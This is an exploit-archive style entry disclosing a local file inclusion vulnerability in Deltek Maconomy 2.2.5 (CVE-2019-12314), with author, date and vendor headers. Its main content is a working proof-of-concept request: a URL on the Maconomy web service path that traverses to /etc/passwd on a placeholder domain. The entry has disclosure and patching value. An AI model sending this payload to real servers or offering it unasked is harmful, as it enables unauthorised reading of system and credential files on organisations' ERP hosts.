Deltek Maconomy version 2.2.5 suffers from a local file inclusion vulnerability.
a6d27db934fbef116d7f230a5502215e
# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:
POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd